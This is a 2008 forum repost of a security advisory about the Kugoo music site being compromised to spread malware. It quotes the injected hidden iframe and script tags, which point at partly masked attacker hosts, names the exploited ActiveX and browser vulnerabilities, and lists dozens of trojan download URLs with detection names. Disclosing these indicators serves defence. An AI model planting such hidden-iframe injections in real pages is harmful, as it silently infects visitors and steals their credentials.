下沙论坛

标题: 酷狗网遭遇黑客入侵 用户小心病毒暗流(图) [打印本页]
作者: 竹木刀    时间: 2008-4-19 06:42
标题: 酷狗网遭遇黑客入侵 用户小心病毒暗流(图)
4月16日,安天实验室发现,酷狗网(http://www.kugoo.com/home/)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。 该网站问题代码: # V' F8 ]7 L! E6 a6 s& w7 o
' t3 W' Y6 _. H8 F; E0 }' X
src="http://ring.ku***.com/cairing/BuildJs/HomePH.aspx"http://ring.ku***.com/cairing/BuildJs/HomePH.aspx
( X1 Q( |& K4 F- \) S
问题框架代码: 9 o  @& E% j- f
7 v5 f4 p# [3 Z; X' o, D7 d0 E; b' n

. u* G2 P$ ^  C2 [9 f  z- _1 c1 `5 E; \) |' F' h# a- x6 l
<iframe src=http://s12.bm***.com/tmp.htm width=0 height=0></iframe> http://s12.bm***.com/tmp.htm
7 g7 n. s) `7 I8 C7 M. J9 c! S  J
问题框架代码: 1 v9 F, L7 h/ ]

* F: \( R$ C8 l  |1 q" Z5 {) E0 K$ i- z# U

2 u$ g7 p5 r$ j* [- u# o, x! ]/ W
<script language="javascript" src="count.js"></script> http://s12.bm***.com/count.js

0 t& t" u9 Z7 b9 @" j问题框架代码:
- ^! ]4 W3 g- c* k
' k1 d( B' E, q! Q% Q
+ K7 c) `. P5 Y2 k% p) @: k* Z& X" T5 P
<iframe src=test.htm width=0 height=0></iframe> http://s12.bm***.com/test.htm
. O, m4 B* Q& K' k
该加密网马解密后可知利用以下漏洞来传播:  
9 k! E9 @& J& J
0 ~; s: U6 ?7 W4 }/ O2 W
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)暴风影音播放器MPS.StormPlayer漏洞RealPlayer播放器IERPCtl.IERPCtl.1漏洞迅雷漏洞百度搜霸漏洞联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞

2 k; [5 @! z! o' i5 T/ h当用户运行酷狗2007或访问酷狗网(http://www.kugoo.com/home/)时,系统会自动下载以下病毒文件: 3 |8 z5 V8 x: w3 A- g
3 Q! z" y2 v+ e. P: r2 f# m
  http://aa1.us***.com/down/1.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/2.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/3.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafp)  http://aa1.us***.com/down/4.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaf)  http://aa1.us***.com/down/5.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zjk)  http://aa1.us***.com/down/6.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.anv)  http://aa1.us***.com/down/7.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.anv)  http://aa1.us***.com/down/8.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aadu)  http://aa1.us***.com/down/9.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zso)  http://aa1.us***.com/down/10.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/11.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aadz)  http://aa2.us***.com/down/12.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafo)  http://aa2.us***.com/down/13.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/14.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/15.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaed)  http://aa2.us***.com/down/16.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/17.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.aaig)  http://aa2.us***.com/down/18.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/19.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaog)  http://aa2.us***.com/down/20.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/21.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/22.exe   病毒名:(Trojan-Downloader.Win32.Tiny.anv)  http://aa3.us***.com/down/23.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafa)  http://aa3.us***.com/down/24.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/25.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/26.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aaes)  http://aa3.us***.com/down/27.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.xmp)  http://aa3.us***.com/down/28.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aasp)  http://aa3.us***.com/down/29.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.zvr)  http://aa3.us***.com/down/30.exe   病毒名:(Trojan-Downloader.Win32.Tiny.anv)  http://aa3.us***.com/down/31.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.yip)  http://aa3.us***.com/down/32.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafg)  http://aa3.us***.com/down/33.exe  病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)  http://aa3.us***.com/down/34.exe   病毒名:(Trojan-PSW.Win32.OnLineGames.aafq)
: k1 s3 D. n1 Z( e8 V  K* I* [
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会,盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。



欢迎光临 下沙论坛 (http://bbs.xiasha.cn/) Powered by Discuz! X3.3